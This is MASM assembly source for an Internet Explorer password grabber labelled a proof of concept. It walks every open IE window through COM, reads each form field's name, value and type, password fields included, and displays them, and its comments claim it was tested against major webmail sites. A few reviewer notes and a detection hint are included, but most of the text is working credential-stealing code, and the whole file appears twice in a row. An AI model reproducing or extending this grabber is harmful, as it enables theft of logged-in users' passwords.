comment %
#------------------------------------------------------------------#
# Internet Explorer password grabber -- proof of concept only.      #
# Walks every open IE window through the IShellWindows (COM/DCOM)   #
# interface and reads each form input (name / value / type) out of  #
# the live DOM. Password fields are not excluded, so this exposes   #
# the credentials of whoever is logged in. Demo code, not hardened. #
# 2006.06.28                                                        #
# code: czy                                                         #
#------------------------------------------------------------------#
system : tested on IE6 + Windows XP SP2
webmail: tested against yahoo, hotmail, gmail, ...
%
.586
.model flat, stdcall
option casemap :none ; case sensitive
include /masm32/bin/iep.inc
; #########################################################################
.const
; Class / interface GUIDs. The sCLSID_* / sIID_* text macros are not defined in
; this file -- presumably they come from iep.inc (included above); verify there.
; The spelling mismatch IID_ShellWindows vs sIID_ShellWindow is harmless as long
; as that macro name exists in the include.
CLSID_ShellWindows GUID sCLSID_ShellWindows   ; ShellWindows object (Explorer/IE window list)
IID_ShellWindows GUID sIID_ShellWindow        ; IShellWindows
IID_WB GUID sIID_WB                           ; IWebBrowser2
IID_DOC GUID sIID_DOC                         ; IHTMLDocument2
IID_HTMLFE GUID sIID_HTMLFE                   ; IHTMLFormElement
IID_HTMLIPTE GUID sIID_HTMLIPTE               ; IHTMLInputTextElement
.data
format db 'form num:%d',0     ; only referenced from commented-out debug code in FindIEPass
format2 db 'elem num:%d',0    ; same -- dead unless that debug code is re-enabled
; UNICODE fragments concatenated into the report line:
;   Name=[...] Value=[...] Type=[...]\r\nTitle=...
b1 dw 'N','a','m','e','=','[',0,0
b2 dw 'V','a','l','u','e','=','[',0,0
b3 dw 'T','y','p','e','=','[',0,0
b4 dw ']',' ',0,0
b5 dw ']',13,10,'T','i','t','l','e','=',0,0
mynull dw 'N','U','L','L',0,0     ; substituted by CheckNull when an attribute BSTR is empty/NULL
errgetforms db '得到FORMS错误',0    ; ANSI, roughly "failed to get FORMS"; shown via MessageBox (ANSI)
.data?
; All working state is file-level (no locals), so FindIEPass is not reentrant.
pps dd ? ;IShellWindows*
ppi dd ? ;IDispatch* returned by IShellWindows::Item
ppi2 dd ? ;IWebBrowser2* (QI of ppi)
ppd dd ? ;IDispatch* returned by IWebBrowser2::get_Document
ppd2 dd ? ;IHTMLDocument2* (QI of ppd)
pphtmlec dd ? ;IHTMLElementCollection* (document.forms)
ppfe dd ? ;IDispatch* for one form
ppfe2 dd ? ;IHTMLFormElement* (QI of ppfe)
ppie dd ? ;IDispatch* for one form element
ppie2 dd ? ;IHTMLInputTextElement* (QI of ppie)
ienum dd ? ;window count, counted down to 0 as the loop index
formnum dd ? ;form count / loop index (counted down)
elemnum dd ? ;element count / loop index (counted down)
buffer db 512 dup (0) ;report line, 256 WCHARs; worst case ~253 WCHARs with the 31/31/31/127-char limits below
height dd ? ;unused
ielocation db 256 dup(?) ;window URL, <=128 WCHARs incl. NUL (lstrcpynW ...,128)
tit dd ? ;BSTR from IHTMLDocument2::get_title (never SysFreeString'd)
pieloc dd ? ;BSTR from IWebBrowser2::get_LocationURL (never SysFreeString'd)
inputtype dd ? ;BSTR from get_type
inputvalue dd ? ;BSTR from get_value -- this is the field contents, incl. password fields
inputname dd ? ;BSTR from get_name
szinputname db 64 dup (?) ;32 WCHARs; CheckNull writes at most 32 incl. NUL
szinputvalue db 64 dup (?)
szinputtype db 64 dup (?)
szietitle db 256 dup (?) ;document title, <=128 WCHARs incl. NUL
.code
;-----------------------------------------------------------------------
; CheckNull(szinputaddr, input)
;   Copies the UNICODE string at `input` into the 32-WCHAR buffer at
;   `szinputaddr`, truncating to 31 characters plus NUL. When `input` is
;   empty (or NULL -- lstrlenW reports 0 for that too) the literal "NULL"
;   from `mynull` is stored instead so the report line stays readable.
; In:    two stdcall DWORD args (pointers)
; Out:   nothing useful in eax (whatever the last lstr* call returned)
; Clobb: eax, ecx, edx (Win32 call)
;-----------------------------------------------------------------------
CheckNull proc szinputaddr:dword,input:dword
    invoke lstrlenW,input
    test eax,eax
    jnz @F
    ; empty / NULL attribute -> substitute the "NULL" marker
    invoke lstrcpyW,szinputaddr,addr mynull
    ret
@@:
    ; non-empty -> bounded copy, 32 WCHARs including the terminator
    invoke lstrcpynW,szinputaddr,input,32
    ret
CheckNull endp
;-----------------------------------------------------------------------
; FindIEPass()
;   Enumerates every window registered with the ShellWindows object,
;   takes the ones that expose IWebBrowser2, reaches their IHTMLDocument2,
;   walks document.forms and, for every element that answers to
;   IHTMLInputTextElement, shows "Name=[..] Value=[..] Type=[..]\r\nTitle=.."
;   in a MessageBoxW captioned with the page URL. Password inputs are not
;   filtered, so this dumps live credentials from the logged-in session --
;   it is a proof of concept, not a tool to run on machines you don't own.
;   Detection hint: a non-browser process instantiating CLSID_ShellWindows
;   and walking the DOM is the observable indicator.
;
;   All state lives in the file-level globals (not reentrant). Most vtable
;   calls are done by hand (mov edx,[obj]; mov edx,[edx]; push args;
;   call [edx+slot*4]) with VARIANT arguments built directly on the stack:
;   four dwords, lowest = vt (3 = VT_I4 in the Windows SDK), third = lVal.
;
; NOTE(review): only pps is Release()d; every other interface pointer and
;   every BSTR (pieloc, tit, inputtype/value/name) is leaked. The QI at the
;   form level and the two item() calls are not HRESULT-checked either.
; Clobb: eax, ecx, edx; globals listed in .data?
;-----------------------------------------------------------------------
FindIEPass proc
LOCAL urlstr: DWORD   ; unused
invoke CoInitialize, 0   ; return value not checked
invoke CoCreateInstance, addr CLSID_ShellWindows, NULL,CLSCTX_ALL ,
addr IID_ShellWindows, addr pps
.IF eax == S_OK
coinvoke pps,IShellWindow,GetCount,addr ienum   ; number of shell/IE windows
.while ienum>0
dec ienum   ; iterate indices count-1 .. 0
mov edx,dword ptr [pps]
mov edx,[edx]   ; edx = IShellWindows vtable
lea eax,ppi
push eax   ; IDispatch **Folder (out)
push 0   ; VARIANT dword 3 (unused high half)
push ienum   ; VARIANT dword 2: lVal = window index
push 0   ; VARIANT dword 1: reserved words
push 3   ; VARIANT dword 0: vt = VT_I4
push dword ptr [pps]   ; this
call dword ptr [edx+20h]   ; slot 8: IShellWindows::Item -> IDispatch of the window
.if eax==0   ; S_OK
coinvoke ppi, IDispatch, QueryInterface, ADDR IID_WB, ADDR ppi2
; ppi2 = IWebBrowser2 (non-browser shell windows fail here and are skipped)
.if eax==0
coinvoke ppi2, IWebBrowser2,LocationURL,addr pieloc   ; BSTR URL (never freed)
invoke lstrcpynW,addr ielocation,pieloc,128   ; <=128 WCHARs into a 256-byte buffer: fits
coinvoke ppi2, IWebBrowser2, Document_get, addr ppd
; ppd = IDispatch of the document
.if eax==0
coinvoke ppd, IDispatch, QueryInterface, ADDR IID_DOC, ADDR ppd2
; ppd2 = IHTMLDocument2
.if eax==0
mov edx,dword ptr [ppd2]
mov edx,[edx]   ; edx = IHTMLDocument2 vtable
lea eax,tit
push eax   ; BSTR *p (out)
push dword ptr [ppd2]   ; this
call dword ptr [edx+4*17] ;IHTMLDocument2::get_title (HRESULT not checked)
invoke lstrcpynW,addr szietitle,tit,128   ; <=128 WCHARs into 256 bytes: fits
;invoke MessageBoxW,0,tit,tit,1 ;debug: show the UNICODE title
mov edx,dword ptr [ppd2]
mov edx,[edx]
lea eax,pphtmlec
push eax   ; IHTMLElementCollection **p (out)
push dword ptr [ppd2]
call dword ptr [edx+4*14] ;IHTMLDocument2::get_forms
.if eax == 0
mov edx,dword ptr [pphtmlec]
mov edx,[edx]   ; edx = IHTMLElementCollection vtable
lea eax,formnum
push eax   ; long *p (out)
push dword ptr [pphtmlec]
call dword ptr [edx+4*9] ;IHTMLElementCollection::get_length (form count)
;invoke wsprintf,addr buffer,addr format,formnum
;invoke MessageBox,0,addr buffer,addr buffer,1
.while formnum>0
dec formnum   ; iterate forms count-1 .. 0
mov edx,dword ptr [pphtmlec]
mov edx,[edx]
lea eax,ppfe
push eax   ; IDispatch **pdisp (out)
push 0   ; VARIANT index: VT_EMPTY (4 dwords of 0)
push 0
push 0
push 0
push 0   ; VARIANT name dword 3
push formnum   ; VARIANT name dword 2: lVal = form index
push 0   ; VARIANT name dword 1
push 3   ; VARIANT name dword 0: vt = VT_I4
push dword ptr [pphtmlec]   ; this
call dword ptr [edx+4*11];IHTMLElementCollection::item(name, index, out) -- HRESULT not checked
; ppfe = IDispatch of the form
coinvoke ppfe, IDispatch, QueryInterface, ADDR IID_HTMLFE, ADDR ppfe2
; NOTE(review): HRESULT not checked; on failure ppfe2 is unusable and the
; vtable fetch below dereferences it anyway.
mov edx,dword ptr [ppfe2]
mov edx,[edx]   ; edx = IHTMLFormElement vtable
lea eax,elemnum
push eax   ; long *p (out)
push dword ptr [ppfe2]
call dword ptr [edx+4*27] ;IHTMLFormElement::get_length (element count)
;invoke wsprintf,addr buffer,addr format2,elemnum
;debug: number of elements in this FORM
;invoke MessageBox,0,addr buffer,addr buffer,1
.while elemnum>0
dec elemnum   ; iterate elements count-1 .. 0
mov edx,dword ptr [ppfe2]
mov edx,[edx]
lea eax,ppie
push eax   ; IDispatch **pdisp (out)
push 0   ; VARIANT index: VT_EMPTY
push 0
push 0
push 0
push 0   ; VARIANT name dword 3
push elemnum   ; VARIANT name dword 2: lVal = element index
push 0   ; VARIANT name dword 1
push 3   ; VARIANT name dword 0: vt = VT_I4
push dword ptr [ppfe2]   ; this
call dword ptr [edx+4*29] ;IHTMLFormElement::item(name, index, out)
; ppie = IDispatch of the element
.if eax==0
coinvoke ppie, IDispatch, QueryInterface, ADDR IID_HTMLIPTE, ADDR ppie2
; ppie2 = IHTMLInputTextElement; non-text elements (select, textarea, ...) fail the QI and are skipped
.if eax==0
;---GET TYPE
;mov edx,dword ptr [ppie2]
;mov edx,[edx]
;lea eax,inputtype
;push eax
;push dword ptr [ppie2]
;call dword ptr [edx+4*7] ;IHTMLInputTextElement->gettype (manual vtable form of the coinvoke below)
coinvoke ppie2,IHTMLInputTextElement,GetType,addr inputtype   ; BSTR (never freed)
invoke CheckNull,addr szinputtype,inputtype   ; <=31 chars or "NULL"
;---GET VALUE (this is the field contents -- includes type=password fields)
coinvoke ppie2,IHTMLInputTextElement,GetValue,addr inputvalue
invoke CheckNull,addr szinputvalue,inputvalue
;---GET NAME
coinvoke ppie2,IHTMLInputTextElement,GetName,addr inputname
invoke CheckNull,addr szinputname,inputname
; Build "Name=[n] Value=[v] Type=[t]\r\nTitle=<title>" in buffer (256 WCHARs;
; 31+31+31+127 payload plus 30 fixed chars fits).
invoke lstrcpyW,addr buffer,addr b1
invoke lstrcatW,addr buffer,addr szinputname
invoke lstrcatW,addr buffer,addr b4
invoke lstrcatW,addr buffer,addr b2
invoke lstrcatW,addr buffer,addr szinputvalue
invoke lstrcatW,addr buffer,addr b4
invoke lstrcatW,addr buffer,addr b3
invoke lstrcatW,addr buffer,addr szinputtype
invoke lstrcatW,addr buffer,addr b5
invoke lstrcatW,addr buffer,addr szietitle
invoke MessageBoxW,0,addr buffer,addr ielocation,1   ; one box per input, captioned with the URL
.endif
.endif
.endw
.endw
.else
; NOTE(review): 'addr tit' passes the address of the pointer variable as the
; ANSI caption, not the title text (tit holds a UNICODE BSTR) -- caption is garbage.
invoke MessageBox,0,addr errgetforms,addr tit,1
.endif
.endif
.endif
.endif
.endif
.endw
; Only the ShellWindows object is released; per-window/document/form/element
; interfaces and all BSTRs above are leaked for the life of the process.
coinvoke pps, IShellWindow, Release
.ENDIF
invoke CoUninitialize   ; called even if CoInitialize failed
ret
FindIEPass endp
; Program entry point: run the DOM walk once, then exit with code 0.
start:
invoke FindIEPass
invoke ExitProcess,0
end start
#------------------------------------------------------------------#
# Internet Explorer password grabber -- proof of concept only.      #
# Walks every open IE window through the IShellWindows (COM/DCOM)   #
# interface and reads each form input (name / value / type) out of  #
# the live DOM. Password fields are not excluded, so this exposes   #
# the credentials of whoever is logged in. Demo code, not hardened. #
# 2006.06.28                                                        #
# code: czy                                                         #
#------------------------------------------------------------------#
system : tested on IE6 + Windows XP SP2
webmail: tested against yahoo, hotmail, gmail, ...
%
.586
.model flat, stdcall
option casemap :none ; case sensitive
include /masm32/bin/iep.inc
; #########################################################################
.const
; Class / interface GUIDs. The sCLSID_* / sIID_* text macros are not defined in
; this file -- presumably they come from iep.inc (included above); verify there.
; The spelling mismatch IID_ShellWindows vs sIID_ShellWindow is harmless as long
; as that macro name exists in the include.
CLSID_ShellWindows GUID sCLSID_ShellWindows   ; ShellWindows object (Explorer/IE window list)
IID_ShellWindows GUID sIID_ShellWindow        ; IShellWindows
IID_WB GUID sIID_WB                           ; IWebBrowser2
IID_DOC GUID sIID_DOC                         ; IHTMLDocument2
IID_HTMLFE GUID sIID_HTMLFE                   ; IHTMLFormElement
IID_HTMLIPTE GUID sIID_HTMLIPTE               ; IHTMLInputTextElement
.data
format db 'form num:%d',0     ; only referenced from commented-out debug code in FindIEPass
format2 db 'elem num:%d',0    ; same -- dead unless that debug code is re-enabled
; UNICODE fragments concatenated into the report line:
;   Name=[...] Value=[...] Type=[...]\r\nTitle=...
b1 dw 'N','a','m','e','=','[',0,0
b2 dw 'V','a','l','u','e','=','[',0,0
b3 dw 'T','y','p','e','=','[',0,0
b4 dw ']',' ',0,0
b5 dw ']',13,10,'T','i','t','l','e','=',0,0
mynull dw 'N','U','L','L',0,0     ; substituted by CheckNull when an attribute BSTR is empty/NULL
errgetforms db '得到FORMS错误',0    ; ANSI, roughly "failed to get FORMS"; shown via MessageBox (ANSI)
.data?
; All working state is file-level (no locals), so FindIEPass is not reentrant.
pps dd ? ;IShellWindows*
ppi dd ? ;IDispatch* returned by IShellWindows::Item
ppi2 dd ? ;IWebBrowser2* (QI of ppi)
ppd dd ? ;IDispatch* returned by IWebBrowser2::get_Document
ppd2 dd ? ;IHTMLDocument2* (QI of ppd)
pphtmlec dd ? ;IHTMLElementCollection* (document.forms)
ppfe dd ? ;IDispatch* for one form
ppfe2 dd ? ;IHTMLFormElement* (QI of ppfe)
ppie dd ? ;IDispatch* for one form element
ppie2 dd ? ;IHTMLInputTextElement* (QI of ppie)
ienum dd ? ;window count, counted down to 0 as the loop index
formnum dd ? ;form count / loop index (counted down)
elemnum dd ? ;element count / loop index (counted down)
buffer db 512 dup (0) ;report line, 256 WCHARs; worst case ~253 WCHARs with the 31/31/31/127-char limits below
height dd ? ;unused
ielocation db 256 dup(?) ;window URL, <=128 WCHARs incl. NUL (lstrcpynW ...,128)
tit dd ? ;BSTR from IHTMLDocument2::get_title (never SysFreeString'd)
pieloc dd ? ;BSTR from IWebBrowser2::get_LocationURL (never SysFreeString'd)
inputtype dd ? ;BSTR from get_type
inputvalue dd ? ;BSTR from get_value -- this is the field contents, incl. password fields
inputname dd ? ;BSTR from get_name
szinputname db 64 dup (?) ;32 WCHARs; CheckNull writes at most 32 incl. NUL
szinputvalue db 64 dup (?)
szinputtype db 64 dup (?)
szietitle db 256 dup (?) ;document title, <=128 WCHARs incl. NUL
.code
;-----------------------------------------------------------------------
; CheckNull(szinputaddr, input)
;   Copies the UNICODE string at `input` into the 32-WCHAR buffer at
;   `szinputaddr`, truncating to 31 characters plus NUL. When `input` is
;   empty (or NULL -- lstrlenW reports 0 for that too) the literal "NULL"
;   from `mynull` is stored instead so the report line stays readable.
; In:    two stdcall DWORD args (pointers)
; Out:   nothing useful in eax (whatever the last lstr* call returned)
; Clobb: eax, ecx, edx (Win32 call)
;-----------------------------------------------------------------------
CheckNull proc szinputaddr:dword,input:dword
    invoke lstrlenW,input
    test eax,eax
    jnz @F
    ; empty / NULL attribute -> substitute the "NULL" marker
    invoke lstrcpyW,szinputaddr,addr mynull
    ret
@@:
    ; non-empty -> bounded copy, 32 WCHARs including the terminator
    invoke lstrcpynW,szinputaddr,input,32
    ret
CheckNull endp
;-----------------------------------------------------------------------
; FindIEPass()
;   Enumerates every window registered with the ShellWindows object,
;   takes the ones that expose IWebBrowser2, reaches their IHTMLDocument2,
;   walks document.forms and, for every element that answers to
;   IHTMLInputTextElement, shows "Name=[..] Value=[..] Type=[..]\r\nTitle=.."
;   in a MessageBoxW captioned with the page URL. Password inputs are not
;   filtered, so this dumps live credentials from the logged-in session --
;   it is a proof of concept, not a tool to run on machines you don't own.
;   Detection hint: a non-browser process instantiating CLSID_ShellWindows
;   and walking the DOM is the observable indicator.
;
;   All state lives in the file-level globals (not reentrant). Most vtable
;   calls are done by hand (mov edx,[obj]; mov edx,[edx]; push args;
;   call [edx+slot*4]) with VARIANT arguments built directly on the stack:
;   four dwords, lowest = vt (3 = VT_I4 in the Windows SDK), third = lVal.
;
; NOTE(review): only pps is Release()d; every other interface pointer and
;   every BSTR (pieloc, tit, inputtype/value/name) is leaked. The QI at the
;   form level and the two item() calls are not HRESULT-checked either.
; Clobb: eax, ecx, edx; globals listed in .data?
;-----------------------------------------------------------------------
FindIEPass proc
LOCAL urlstr: DWORD   ; unused
invoke CoInitialize, 0   ; return value not checked
invoke CoCreateInstance, addr CLSID_ShellWindows, NULL,CLSCTX_ALL ,
addr IID_ShellWindows, addr pps
.IF eax == S_OK
coinvoke pps,IShellWindow,GetCount,addr ienum   ; number of shell/IE windows
.while ienum>0
dec ienum   ; iterate indices count-1 .. 0
mov edx,dword ptr [pps]
mov edx,[edx]   ; edx = IShellWindows vtable
lea eax,ppi
push eax   ; IDispatch **Folder (out)
push 0   ; VARIANT dword 3 (unused high half)
push ienum   ; VARIANT dword 2: lVal = window index
push 0   ; VARIANT dword 1: reserved words
push 3   ; VARIANT dword 0: vt = VT_I4
push dword ptr [pps]   ; this
call dword ptr [edx+20h]   ; slot 8: IShellWindows::Item -> IDispatch of the window
.if eax==0   ; S_OK
coinvoke ppi, IDispatch, QueryInterface, ADDR IID_WB, ADDR ppi2
; ppi2 = IWebBrowser2 (non-browser shell windows fail here and are skipped)
.if eax==0
coinvoke ppi2, IWebBrowser2,LocationURL,addr pieloc   ; BSTR URL (never freed)
invoke lstrcpynW,addr ielocation,pieloc,128   ; <=128 WCHARs into a 256-byte buffer: fits
coinvoke ppi2, IWebBrowser2, Document_get, addr ppd
; ppd = IDispatch of the document
.if eax==0
coinvoke ppd, IDispatch, QueryInterface, ADDR IID_DOC, ADDR ppd2
; ppd2 = IHTMLDocument2
.if eax==0
mov edx,dword ptr [ppd2]
mov edx,[edx]   ; edx = IHTMLDocument2 vtable
lea eax,tit
push eax   ; BSTR *p (out)
push dword ptr [ppd2]   ; this
call dword ptr [edx+4*17] ;IHTMLDocument2::get_title (HRESULT not checked)
invoke lstrcpynW,addr szietitle,tit,128   ; <=128 WCHARs into 256 bytes: fits
;invoke MessageBoxW,0,tit,tit,1 ;debug: show the UNICODE title
mov edx,dword ptr [ppd2]
mov edx,[edx]
lea eax,pphtmlec
push eax   ; IHTMLElementCollection **p (out)
push dword ptr [ppd2]
call dword ptr [edx+4*14] ;IHTMLDocument2::get_forms
.if eax == 0
mov edx,dword ptr [pphtmlec]
mov edx,[edx]   ; edx = IHTMLElementCollection vtable
lea eax,formnum
push eax   ; long *p (out)
push dword ptr [pphtmlec]
call dword ptr [edx+4*9] ;IHTMLElementCollection::get_length (form count)
;invoke wsprintf,addr buffer,addr format,formnum
;invoke MessageBox,0,addr buffer,addr buffer,1
.while formnum>0
dec formnum   ; iterate forms count-1 .. 0
mov edx,dword ptr [pphtmlec]
mov edx,[edx]
lea eax,ppfe
push eax   ; IDispatch **pdisp (out)
push 0   ; VARIANT index: VT_EMPTY (4 dwords of 0)
push 0
push 0
push 0
push 0   ; VARIANT name dword 3
push formnum   ; VARIANT name dword 2: lVal = form index
push 0   ; VARIANT name dword 1
push 3   ; VARIANT name dword 0: vt = VT_I4
push dword ptr [pphtmlec]   ; this
call dword ptr [edx+4*11];IHTMLElementCollection::item(name, index, out) -- HRESULT not checked
; ppfe = IDispatch of the form
coinvoke ppfe, IDispatch, QueryInterface, ADDR IID_HTMLFE, ADDR ppfe2
; NOTE(review): HRESULT not checked; on failure ppfe2 is unusable and the
; vtable fetch below dereferences it anyway.
mov edx,dword ptr [ppfe2]
mov edx,[edx]   ; edx = IHTMLFormElement vtable
lea eax,elemnum
push eax   ; long *p (out)
push dword ptr [ppfe2]
call dword ptr [edx+4*27] ;IHTMLFormElement::get_length (element count)
;invoke wsprintf,addr buffer,addr format2,elemnum
;debug: number of elements in this FORM
;invoke MessageBox,0,addr buffer,addr buffer,1
.while elemnum>0
dec elemnum   ; iterate elements count-1 .. 0
mov edx,dword ptr [ppfe2]
mov edx,[edx]
lea eax,ppie
push eax   ; IDispatch **pdisp (out)
push 0   ; VARIANT index: VT_EMPTY
push 0
push 0
push 0
push 0   ; VARIANT name dword 3
push elemnum   ; VARIANT name dword 2: lVal = element index
push 0   ; VARIANT name dword 1
push 3   ; VARIANT name dword 0: vt = VT_I4
push dword ptr [ppfe2]   ; this
call dword ptr [edx+4*29] ;IHTMLFormElement::item(name, index, out)
; ppie = IDispatch of the element
.if eax==0
coinvoke ppie, IDispatch, QueryInterface, ADDR IID_HTMLIPTE, ADDR ppie2
; ppie2 = IHTMLInputTextElement; non-text elements (select, textarea, ...) fail the QI and are skipped
.if eax==0
;---GET TYPE
;mov edx,dword ptr [ppie2]
;mov edx,[edx]
;lea eax,inputtype
;push eax
;push dword ptr [ppie2]
;call dword ptr [edx+4*7] ;IHTMLInputTextElement->gettype (manual vtable form of the coinvoke below)
coinvoke ppie2,IHTMLInputTextElement,GetType,addr inputtype   ; BSTR (never freed)
invoke CheckNull,addr szinputtype,inputtype   ; <=31 chars or "NULL"
;---GET VALUE (this is the field contents -- includes type=password fields)
coinvoke ppie2,IHTMLInputTextElement,GetValue,addr inputvalue
invoke CheckNull,addr szinputvalue,inputvalue
;---GET NAME
coinvoke ppie2,IHTMLInputTextElement,GetName,addr inputname
invoke CheckNull,addr szinputname,inputname
; Build "Name=[n] Value=[v] Type=[t]\r\nTitle=<title>" in buffer (256 WCHARs;
; 31+31+31+127 payload plus 30 fixed chars fits).
invoke lstrcpyW,addr buffer,addr b1
invoke lstrcatW,addr buffer,addr szinputname
invoke lstrcatW,addr buffer,addr b4
invoke lstrcatW,addr buffer,addr b2
invoke lstrcatW,addr buffer,addr szinputvalue
invoke lstrcatW,addr buffer,addr b4
invoke lstrcatW,addr buffer,addr b3
invoke lstrcatW,addr buffer,addr szinputtype
invoke lstrcatW,addr buffer,addr b5
invoke lstrcatW,addr buffer,addr szietitle
invoke MessageBoxW,0,addr buffer,addr ielocation,1   ; one box per input, captioned with the URL
.endif
.endif
.endw
.endw
.else
; NOTE(review): 'addr tit' passes the address of the pointer variable as the
; ANSI caption, not the title text (tit holds a UNICODE BSTR) -- caption is garbage.
invoke MessageBox,0,addr errgetforms,addr tit,1
.endif
.endif
.endif
.endif
.endif
.endw
; Only the ShellWindows object is released; per-window/document/form/element
; interfaces and all BSTRs above are leaked for the life of the process.
coinvoke pps, IShellWindow, Release
.ENDIF
invoke CoUninitialize   ; called even if CoInitialize failed
ret
FindIEPass endp
; Program entry point: run the DOM walk once, then exit with code 0.
start:
invoke FindIEPass
invoke ExitProcess,0
end start